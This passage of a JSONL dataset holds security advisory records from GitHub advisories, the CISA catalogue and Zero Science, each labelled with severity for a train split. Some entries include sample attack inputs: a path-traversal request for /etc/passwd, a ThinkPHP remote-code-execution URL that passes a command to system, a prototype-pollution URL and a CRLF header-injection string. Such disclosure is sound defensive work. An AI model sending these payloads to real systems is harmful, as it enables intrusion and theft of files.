a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in bowe\n\n[Severity: CRITICAL]\n\nVersion 1.8.4 of `bowee` contained malicious code as a preinstall script. The package downloaded a file from a remote server, executed it and opened a backdoor.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-02", "split": "train"} -{"id": "21f99cde5505abf4f8e8", "text": "Directory Traversal in gomeplus-h5-proxy\n\nAffected versions of `gomeplus-h5-proxy` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "text_raw": "Directory Traversal in gomeplus-h5-proxy\n\n[Severity: HIGH]\n\nAffected versions of `gomeplus-h5-proxy` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-24", "split": "train"} -{"id": "27dead2e5da77dbfcaf4", "text": "Incorrect handling of CORS preflight request headers in hapi\n\nVersions of `hapi` prior to 11.0.0 implement CORS incorrectly, allowing for configurations that at best return inconsistent headers, and at worst allow cross-origin activities that are expected to be forbidden.\n\nIf the connection has CORS enabled but one route has it off, and the route is not GET, the OPTIONS prefetch request will return the default CORS headers and then the actual request will go through and return no CORS headers. This defeats the purpose of turning CORS on the route.\n\n## Recommendation\n\nUpdate to version 11.0.0 or later.", "text_raw": "Incorrect handling of CORS preflight request headers in hapi\n\n[Severity: MEDIUM]\n\nVersions of `hapi` prior to 11.0.0 implement CORS incorrectly, allowing for configurations that at best return inconsistent headers, and at worst allow cross-origin activities that are expected to be forbidden. \n\nIf the connection has CORS enabled but one route has it off, and the route is not GET, the OPTIONS prefetch request will return the default CORS headers and then the actual request will go through and return no CORS headers. This defeats the purpose of turning CORS on the route.\n\n\n## Recommendation\n\nUpdate to version 11.0.0 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-06-07", "split": "train"} -{"id": "10ef458297daedea9cc5", "text": "Safemode Gem Has Incomplete List of Disallowed Inputs\n\nrubygem-safemode, as used in Foreman, versions 1.3.1 and earlier are vulnerable to bypassing safe mode limitations via special Ruby syntax. This can lead to deletion of objects for which the user does not have delete permissions or possibly to privilege escalation.", "text_raw": "Safemode Gem Has Incomplete List of Disallowed Inputs\n\n[Severity: CRITICAL]\n\nrubygem-safemode, as used in Foreman, versions 1.3.1 and earlier are vulnerable to bypassing safe mode limitations via special Ruby syntax. This can lead to deletion of objects for which the user does not have delete permissions or possibly to privilege escalation.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "436ffe75c0269d18a9b6", "text": "Malicious Package in commqnder\n\nAll versions of `commqnder` contain malicious code . The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. Upon require the package attempts to start a cryptocurrency miner using coin-hive.\n\n## Recommendation\n\nRemove the package from your environment and verify whether your system is running the cryptocurrency miner.", "text_raw": "Malicious Package in commqnder\n\n[Severity: CRITICAL]\n\nAll versions of `commqnder` contain malicious code . The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. Upon require the package attempts to start a cryptocurrency miner using coin-hive.\n\n\n## Recommendation\n\nRemove the package from your environment and verify whether your system is running the cryptocurrency miner.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-11", "split": "train"} -{"id": "aa7b4e4b69b8aed98b44", "text": "ThinkPHP Remote Code Execution Vulnerability\n\nAffected: ThinkPHP ThinkPHP\n\nThinkPHP contains an unspecified vulnerability that allows for remote code execution via public//?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-306, CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "ThinkPHP Remote Code Execution Vulnerability\n\nAffected: ThinkPHP ThinkPHP\n\nThinkPHP contains an unspecified vulnerability that allows for remote code execution via public//?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-306, CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "e74d2388491ea8e82158", "text": "Mitmweb in mitmproxy allows DNS Rebinding attacks\n\nmitmweb in mitmproxy before v4.0.4 allows DNS Rebinding attacks, related to tools/web/app.py.", "text_raw": "Mitmweb in mitmproxy allows DNS Rebinding attacks\n\n[Severity: CRITICAL]\n\nmitmweb in mitmproxy before v4.0.4 allows DNS Rebinding attacks, related to tools/web/app.py.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-07-31", "split": "train"} -{"id": "91874fae3b57d16eda87", "text": "Microsoft Office and WordPad Remote Code Execution Vulnerability\n\nAffected: Microsoft Office and WordPad\n\nMicrosoft Office and WordPad contain an unspecified vulnerability due to the way the applications parse specially crafted files. Successful exploitation allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Microsoft Office and WordPad Remote Code Execution Vulnerability\n\nAffected: Microsoft Office and WordPad\n\nMicrosoft Office and WordPad contain an unspecified vulnerability due to the way the applications parse specially crafted files. Successful exploitation allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "7fd25e55ab4b3371c78f", "text": "jackson-databind vulnerable to deserialization flaw leading to unauthenticated remote code execution\n\njackson-databind in versions prior to 2.8.11 and 2.9.4 contain a deserialization flaw which allows an unauthenticated user to perform code execution by sending maliciously crafted input to the readValue method of the ObjectMapper. This issue extends the previous flaw CVE-2017-7525, blacklisting additonal vulnerable classes.", "text_raw": "jackson-databind vulnerable to deserialization flaw leading to unauthenticated remote code execution\n\n[Severity: CRITICAL]\n\njackson-databind in versions prior to 2.8.11 and 2.9.4 contain a deserialization flaw which allows an unauthenticated user to perform code execution by sending maliciously crafted input to the readValue method of the ObjectMapper. This issue extends the previous flaw CVE-2017-7525, blacklisting additonal vulnerable classes.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-10-18", "split": "train"} -{"id": "c579d2885f5548e372c4", "text": "Prototype pollution in aurelia-path\n\n### Impact\nThe vulnerability exposes Aurelia application that uses `aurelia-path` package to parse a string. The majority of this will be Aurelia applications that employ the `aurelia-router` package. An example is this could allow an attacker to change the prototype of base object class `Object` by tricking an application to parse the following URL: `https://aurelia.io/blog/?__proto__[asdf]=asdf`\n\n### Patches\nThe problem should be patched in version `1.1.7`. Any version earlier than this is vulnerable.\n\n### Workarounds\nA partial work around is to free the Object prototype:\n```ts\nObject.freeze(Object.prototype)\n```", "text_raw": "Prototype pollution in aurelia-path\n\n[Severity: CRITICAL]\n\n### Impact\nThe vulnerability exposes Aurelia application that uses `aurelia-path` package to parse a string. The majority of this will be Aurelia applications that employ the `aurelia-router` package. An example is this could allow an attacker to change the prototype of base object class `Object` by tricking an application to parse the following URL: `https://aurelia.io/blog/?__proto__[asdf]=asdf`\n\n### Patches\nThe problem should be patched in version `1.1.7`. Any version earlier than this is vulnerable.\n\n### Workarounds\nA partial work around is to free the Object prototype:\n```ts\nObject.freeze(Object.prototype)\n```", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-09-27", "split": "train"} -{"id": "c3ec37cf67a5b9c7b6ed", "text": "CRLF injection in httplib2\n\n### Impact\nAttacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server.\n\nImpacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping.\n\n### Patches\nProblem has been fixed in 0.18.0\nSpace, CR, LF characters are now quoted before any use.\nThis solution should not impact any valid usage of httplib2 library, that is uri constructed by urllib.\n\n### Workarounds\nCreate URI with `urllib.parse` family functions: `urlencode`, `urlunsplit`.\n\n```diff\nuser_input = \" HTTP/1.1\\r\\ninjected: attack\\r\\nignore-http:\"\n-uri = \"https://api.server/?q={}\".format(user_input)\n+uri = urllib.parse.urlunsplit((\"https\", \"api.server\", \"/v1\", urllib.parse.urlencode({\"q\": user_input}), \"\"))\nhttp.request(uri)\n```\n\n### References\nhttps://cwe.mitre.org/data/definitions/93.html\nhttps://docs.python.org/3/library/urllib.parse.html\n\nThanks to Recar https://github.com/Ciyfly for finding vulnerability and discrete notification.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [httplib2](https://github.com/httplib2/httplib2/issues/new)\n* Email [current maintainer at 2020-05](mailto:temotor@gmail.com)", "text_raw": "CRLF injection in httplib2\n\n[Severity: MEDIUM]\n\n### Impact\nAttacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server.\n\nImpacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping.\n\n### Patches\nProblem has been fixed in 0.18.0\nSpace, CR, LF characters are now quoted before any use.\nThis solution should not impact any valid usage of httplib2 library, that is uri constructed by urllib.\n\n### Workarounds\nCreate URI with `urllib.parse` family functions: `urlencode`, `urlunsplit`.\n\n```diff\nuser_input = \" HTTP/1.1\\r\\ninjected: attack\\r\\nignore-http:\"\n-uri = \"https://api.server/?q={}\".format(user_input)\n+uri = urllib.parse.urlunsplit((\"https\", \"api.server\", \"/v1\", urllib.parse.urlencode({\"q\": user_input}), \"\"))\nhttp.request(uri)\n```\n\n### References\nhttps://cwe.mitre.org/data/definitions/93.html\nhttps://docs.python.org/3/library/urllib.parse.html\n\nThanks to Recar https://github.com/Ciyfly for finding vulnerability and discrete notification.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [httplib2](https://github.com/httplib2/httplib2/issues/new)\n* Email [current maintainer at 2020-05](mailto:temotor@gmail.com)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-05-20", "split": "train"} -{"id": "231f732675644aef0303", "text": "Node-Redis potential exponential regex in monitor mode\n\n### Impact\nWhen a client is in monitoring mode, the regex begin used to detected monitor messages could cause exponential backtracking on some strings. This issue could lead to a denial of service.\n\n### Patches\nThe problem was fixed in commit [`2d11b6d`](https://github.com/NodeRedis/node-redis/commit/2d11b6dc9b9774464a91fb4b448bad8bf699629e) and was released in version `3.1.1`.\n\n### References\n#1569 (GHSL-2021-026)", "text_raw": "Node-Redis potential exponential regex in monitor mode\n\n[Severity: HIGH]\n\n### Impact\nWhen a client is in monitoring mode, the regex begin used to detected monitor messages could cause exponential backtracking on some strings. This issue could lead to a denial of service.\n\n### Patches\nThe problem was fixed in commit [`2d11b6d`](https://github.com/NodeRedis/node-redis/commit/2d11b6dc9b9774464a91fb4b448bad8bf699629e) and was released in version `3.1.1`.\n\n### References\n#1569 (GHSL-2021-026)", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-04-27", "split": "train"} -{"id": "1bbda3841ef072c1633d", "text": "Deserialization of Untrusted Data in logback\n\nIn logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP servers.", "text_raw": "Deserialization of Untrusted Data in logback\n\n[Severity: MEDIUM]\n\nIn logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP servers.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-12-17", "split": "train"} -{"id": "961a57fd4b654332641e", "text": "FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 CSRF Add Admin Exploit", "text_raw": "FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 CSRF Add Admin Exploit\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2021-09-27", "split": "train"} -{"id": "4deba69fbfd834bfa2cf", "text": "Baumer VeriSens Application Suite 2.6.2 Buffer Overflow Vulnerability", "text_raw": "Baumer VeriSens Application Suite 2.6.2 Buffer Overflow Vulnerability\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2016-02-02", "split": "train"} -{"id": "d1715cb58c6763629ffc", "text": "Prototype Pollution in @fabiocaccamo/utils.js\n\nutils.js is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution').", "text_raw": "Prototype Pollution in @fabiocaccamo/utils.js\n\n[Severity: HIGH]\n\nutils.js is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution').", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-12-10", "split": "train"} -{"id": "59626b1003734e46c0d5", "text": "steroids downloads resources over HTTP\n\nAffected versions of `steroids` insecurely download an executable over an unencrypted HTTP connection.\n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `steroids`.\n\n## Recommendation\n\nThis vulnerability was discovered and reported in 2016, yet has not seen a patch issued as of 03/2018. As of 08/2022, [the package is marked as deprecated](https://www.npmjs.com/package/steroids) and the GitHub repository is no longer publicly available.\n\nThe best path forward for mitigating this issue is to attempt to use an alternative module that is actively maintained and which provides similar functionality, such as the native PhoneGap API.", "text_raw": "steroids downloads resources over HTTP\n\n[Severity: HIGH]\n\nAffected versions of `steroids` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `steroids`.\n\n\n## Recommendation\n\nThis vulnerability was discovered and reported in 2016, yet has not seen a patch issued as of 03/2018. As of 08/2022, [the package is marked as deprecated](https://www.npmjs.com/package/steroids) and the GitHub repository is no longer publicly available.\n\nThe best path forward for mitigating this issue is to attempt to use an alternative module that is actively maintained and which provides similar functionality, such as the native PhoneGap API.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "0bec5f551710d258204f", "text": "Regex denial of service vulnerability in codesample plugin\n\n### Impact\nA regex denial of service (ReDoS) vulnerability was discovered in a dependency of the `codesample` plugin. The vulnerability allowed poorly formed ruby code samples to lock up the browser while performing syntax highlighting. This impacts users of the `codesample` plugin using TinyMCE 5.5.1 or lower.\n\n### Patches\nThis vulnerability has been patched in TinyMCE 5.6.0 by upgrading to a version of the dependency without the vulnerability.\n\n### Workarounds\nTo work around this vulnerability, either:\n- Upgrade to TinyMCE 5.6.0 or higher\n- Disable the `codesample` plugin\n- Disable ruby code samples using the [codesample_languages](https://www.tiny.cloud/docs/plugins/opensource/codesample/#exampleusingcodesample_languages) setting\n- Override the PrismJS syntax highlighter to version 1.21.0 or higher using the [codesample_global_prismjs](https://www.tiny.cloud/docs/plugins/opensource/codesample/#codesample_global_prismjs) setting\n\n### Acknowledgements\nTiny Technologies would like to thank Erik Krogh Kristensen at GitHub for discovering this vulnerability.\n\n### References\nhttps://www.tiny.cloud/docs/release-notes/release-notes56/#securityfixes\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in the [TinyMCE repo](http://github.com/tinymce/tinymce/issues)\n* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)", "text_raw": "Regex denial of service vulnerability in codesample plugin\n\n[Severity: LOW]\n\n### Impact\nA regex denial of service (ReDoS) vulnerability was discovered in a dependency of the `codesample` plugin. The vulnerability allowed poorly formed ruby code samples to lock up the browser while performing syntax highlighting. This impacts users of the `codesample` plugin using TinyMCE 5.5.1 or lower.\n\n### Patches\nThis vulnerability has been patched in TinyMCE 5.6.0 by upgrading to a version of the dependency without the vulnerability.\n\n### Workarounds\nTo work around this vulnerability, either:\n- Upgrade to TinyMCE 5.6.0 or higher\n- Disable the `codesample` plugin\n- Disable ruby code samples using the [codesample_languages](https://www.tiny.cloud/docs/plugins/opensource/codesample/#exampleusingcodesample_languages) setting\n- Override the PrismJS syntax highlighter to version 1.21.0 or higher using the [codesample_global_prismjs](https://www.tiny.cloud/docs/plugins/opensource/codesample/#codesample_global_prismjs) setting\n\n### Acknowledgements\nTiny Technologies would like to thank Erik Krogh Kristensen at GitHub for discovering this vulnerability.\n\n### References\nhttps://www.tiny.cloud/docs/release-notes/release-notes56/#securityfixes\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in the [TinyMCE repo](http://github.com/tinymce/tinymce/issues)\n* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-01-06", "split": "train"} -{"id": "3a89255d534787f82f8f", "text": "SilverStripe Versioned Files module Unpublished files are exposed publicly\n\nIn the Versioned Files module through 2.0.3 for SilverStripe 3.x, unpublished versions of files are publicly exposed to anyone who can guess their URL. This guess could be highly informed by a basic understanding of the symbiote/silverstripe-versionedfiles source code. (Users who upgrade from SilverStripe 3.x to 4.x and had Versioned Files installed have no further need for this module, because the 4.x release has built-in versioning. However, nothing in the upgrade process automates the destruction of these insecure artefacts, nor alerts the user to the criticality of destruction.)", "text_raw": "SilverStripe Versioned Files module Unpublished files are exposed publicly\n\n[Severity: MEDIUM]\n\nIn the Versioned Files module through 2.0.3 for SilverStripe 3.x, unpublished versions of files are publicly exposed to anyone who can guess their URL. This guess could be highly informed by a basic understanding of the symbiote/silverstripe-versionedfiles source code. (Users who upgrade from SilverStripe 3.x to 4.x and had Versioned Files installed have no further need for this module, because the 4.x release has built-in versioning. However, nothing in the upgrade process automates the destruction of these insecure artefacts, nor alerts the user to the criticality of destruction.)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-11-12", "split": "train"} -{"id": "3e73efa8ab4c4d47b32e", "text": "Uncontrolled resource consumption in nokogiri\n\nThe xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial of service (memory consumption) via a crafted LZMA file, because the decoder functionality does not restrict memory usage to what is required for a legitimate file.", "text_raw": "Uncontrolled resource consumption in nokogiri\n\n[Severity: MEDIUM]\n\nThe xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial of service (memory consumption) via a crafted LZMA file, because the decoder functionality does not restrict memory usage to what is required for a legitimate file.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-04-13", "split": "train"} -{"id": "7ce45c889dadad1fd028", "text": "Cross-site scripting in CLEditor\n\nPremium Software CLEditor 1.4.5 and earlier is affected by: Cross Site Scripting (XSS). The impact is: An attacker might be able to inject arbitrary html and script code into the web site. The component is: jQuery plug-in. The attack vector is: the victim must open a crafted href attribute of a link (A) element.", "text_raw": "Cross-site scripting in CLEditor\n\n[Severity: MEDIUM]\n\nPremium Software CLEditor 1.4.5 and earlier is affected by: Cross Site Scripting (XSS). The impact is: An attacker might be able to inject arbitrary html and script code into the web site. The component is: jQuery plug-in. The attack vector is: the victim must open a crafted href attribute of a link (A) element.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-07-26", "split": "train"} -{"id": "4024daa3dec410e36dbf", "text": "Jupyter Notebook file bypasses sanitization, executes JavaScript\n\nIn Jupyter Notebook before 5.4.1, a maliciously forged notebook file can bypass sanitization to execute JavaScript in the notebook context. Specifically, invalid HTML is 'fixed' by jQuery after sanitization, making it dangerous.", "text_raw": "Jupyter Notebook file bypasses sanitization, executes JavaScript\n\n[Severity: HIGH]\n\nIn Jupyter Notebook before 5.4.1, a maliciously forged notebook file can bypass sanitization to execute JavaScript in the notebook context. Specifically, invalid HTML is 'fixed' by jQuery after sanitization, making it dangerous.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-12", "split": "train"} -{"id": "1c7d502d0300b01953d6", "text": "body-parser-xml vulnerable to Prototype Pollution\n\nbody-parser-xml is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution').", "text_raw": "body-parser-xml vulnerable to Prototype Pollution\n\n[Severity: HIGH]\n\nbody-parser-xml is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution').", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-09-14", "split": "train"} -{"id": "2f40250ad9ee12deaa17", "text": "SAP NetWeaver XML External Entity (XXE) Vulnerability\n\nAffected: SAP NetWeaver\n\nSAP NetWeaver Application Server Java Platforms contains an unspecified vulnerability in BC-BMT-BPM-DSK which allows remote, authenticated users to conduct XML External Entity (XXE) attacks.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-611\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "SAP NetWeaver XML External Entity (XXE) Vulnerability\n\nAffected: SAP NetWeaver\n\nSAP NetWeaver Application Server Java Platforms contains an unspecified vulnerability in BC-BMT-BPM-DSK which allows remote, authenticated users to conduct XML External Entity (XXE) attacks.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-611\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "b0435ab847b4e69ae8f2", "text": "Malicious Package in babel-laoder\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in babel-laoder\n\n[Severity: CRITICAL]\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-04", "split": "train"} -{"id": "8b5766314de1793fef7a", "text": "Server-Side Request Forgery in ftp-srv\n\n### Background\n\nThe FTP protocol creates two connections, one for commands and one for transferring data.\nThis second data connection can be created in two ways, on the server by sending the PASV command, or on the client by sending the PORT command.\n\nThe PORT command sends the IP and port for the server to connect to the client with.\n\n### Issue\nSince the client can send an arbitrary IP with the PORT command, this can be used to cause the server to make a connection elsewhere.\n\n### Patches\n\n* _fix: disallow PORT connections to alternate hosts_: e449e75219d918c400dec65b4b0759f60476abca\n\nDeprecation notices have been published for older versions.\n\n### Workarounds\n\nBlacklisting the FTP Command `PORT` will prevent the server from exposing this behaviour through active connections until a fix is applied.\n```js\nconst ftp = new FtpSrv({\n blacklist: ['PORT']\n});\n```\n\n### References\nhttps://www.npmjs.com/advisories/1445\n\n### Credits\n\nThank you to;\n@trs for fixing it\n@andreeleuterio for reporting it to us for an anonymous user (Vincent) through the NPM platform\n@quiquelhappy for bringing it to our attention after it slipped through the cracks during Christmas\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue at [https://github.com/autovance/ftp-srv](https://github.com/autovance/ftp-srv)\n* Email us directly; security@autovance.com", "text_raw": "Server-Side Request Forgery in ftp-srv\n\n[Severity: CRITICAL]\n\n### Background\n\nThe FTP protocol creates two connections, one for commands and one for transferring data.\nThis second data connection can be created in two ways, on the server by sending the PASV command, or on the client by sending the PORT command.\n\nThe PORT command sends the IP and port for the server to connect to the client with.\n\n### Issue\nSince the client can send an arbitrary IP with the PORT command, this can be used to cause the server to make a connection elsewhere.\n\n### Patches\n\n* _fix: disallow PORT connections to alternate hosts_: e449e75219d918c400dec65b4b0759f60476abca\n\nDeprecation notices have been published for older versions.\n\n### Workarounds\n\nBlacklisting the FTP Command `PORT` will prevent the server from exposing this behaviour through active connections until a fix is applied.\n```js\nconst ftp = new FtpSrv({\n blacklist: ['PORT']\n});\n```\n\n### References\nhttps://www.npmjs.com/advisories/1445\n\n### Credits\n\nThank you to;\n@trs for fixing it\n@andreeleuterio for reporting it to us for an anonymous user (Vincent) through the NPM platform\n@quiquelhappy for bringing it to our attention after it slipped through the cracks during Christmas\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue at [https://github.com/autovance/ftp-srv](https://github.com/autovance/ftp-srv)\n* Email us directly; security@autovance.com", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-08-17", "split": "train"} -{"id": "991c510b1666e9f27ed6", "text": "Ubisoft Uplay 4.6 Insecure File Permissions Local Privilege Escalation", "text_raw": "Ubisoft Uplay 4.6 Insecure File Permissions Local Privilege Escalation\n\nSeverity: low", "severity": "low", "severity_label": 0, "source": "zeroscience", "timestamp": "2014-07-03", "split": "train"} -{"id": "3bf0d76645a793212d18", "text": "Information disclosure in JBoss Weld\n\nRace condition in JBoss Weld before 2.2.8 and 3.x before 3.0.0 Alpha3 allows remote attackers to obtain information from a previous conversation via vectors related to a stale thread state.", "text_raw": "Information disclosure in JBoss Weld\n\n[Severity: MEDIUM]\n\nRace condition in JBoss Weld before 2.2.8 and 3.x before 3.0.0 Alpha3 allows remote attackers to obtain information from a previous conversation via vectors related to a stale thread state.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-06-10", "split": "train"} -{"id": "5ec31cf29b58b91a334f", "text": "Improperly Controlled Modification of Dynamically-Determined Object Attributes in utilitify\n\nutilitify prior to 1.0.3 allows modification of object properties. The merge method could be tricked into adding or modifying properties of the Object.prototype.", "text_raw": "Improperly Controlled Modification of Dynamically-Determined Object Attributes in utilitify\n\n[Severity: HIGH]\n\nutilitify prior to 1.0.3 allows modification of object properties. The merge method could be tricked into adding or modifying properties of the Object.prototype.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-07", "split": "train"} -{"id": "69b8d02ab473edfc4f42", "text": "Gnew v2013.1 Multiple XSS And SQL Injection Vulnerabilities", "text_raw": "Gnew v2013.1 Multiple XSS And SQL Injection Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2013-08-11", "split": "train"} -{"id": "1ffde3096602886a4eaa", "text": "actionpack Cross-site Scripting vulnerability\n\nCross-site scripting (XSS) vulnerability in the `strip_tags` helper in `actionpack/lib/action_controller/vendor/html-scanner/html/node.rb` in Ruby on Rails before 2.3.13, 3.0.x before 3.0.10, and 3.1.x before 3.1.0.rc5 allows remote attackers to inject arbitrary web script or HTML via a tag with an invalid name.", "text_raw": "actionpack Cross-site Scripting vulnerability\n\n[Severity: MEDIUM]\n\nCross-site scripting (XSS) vulnerability in the `strip_tags` helper in `actionpack/lib/action_controller/vendor/html-scanner/html/node.rb` in Ruby on Rails before 2.3.13, 3.0.x before 3.0.10, and 3.1.x before 3.1.0.rc5 allows remote attackers to inject arbitrary web script or HTML via a tag with an invalid name.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "dd73fec5e6e9d92e081b", "text": "LiveQuery publishes user session tokens in parse-server\n\n### Impact\nFor regular (non-LiveQuery) queries, the session token is removed from the response, but for LiveQuery payloads it is currently not. If a user has a LiveQuery subscription on the `Parse.User` class, all session tokens created during user sign-ups will be broadcast as part of the LiveQuery payload.\n\n### Patches\nRemove session token from LiveQuery payload.\n\n### Workaround\nSet `user.acl(new Parse.ACL())` in a beforeSave trigger to make the user private already on sign-up.", "text_raw": "LiveQuery publishes user session tokens in parse-server\n\n[Severity: HIGH]\n\n### Impact\nFor regular (non-LiveQuery) queries, the session token is removed from the response, but for LiveQuery payloads it is currently not. If a user has a LiveQuery subscription on the `Parse.User` class, all session tokens created during user sign-ups will be broadcast as part of the LiveQuery payload.\n\n### Patches\nRemove session token from LiveQuery payload.\n\n### Workaround\nSet `user.acl(new Parse.ACL())` in a beforeSave trigger to make the user private already on sign-up.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-09-30", "split": "train"} -{"id": "6f9127c2b5802af371d9", "text": "Path Traversal in takeapeek\n\nAll versions of `takeapeek` are vulnerable to path traversal exposing files and directories.\n\n## Recommendation\n\nAs no fix is currently available for this vulnerability is it is our recommendation to use another static file server.", "text_raw": "Path Traversal in takeapeek\n\n[Severity: MEDIUM]\n\nAll versions of `takeapeek` are vulnerable to path traversal exposing files and directories.\n\n\n## Recommendation\n\nAs no fix is currently available for this vulnerability is it is our recommendation to use another static file server.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-11-06", "split": "train"} -{"id": "b610bd6fd43032261dc7", "text": "Cross-Site Scripting via SVG media files\n\n### Impact\nCross-Site Scripting via SVG media files\n\n### Patches\nWe recommend updating to the current version 6.4.3.1. You can get the update to 6.4.3.1 regularly via the Auto-Updater or directly via the download 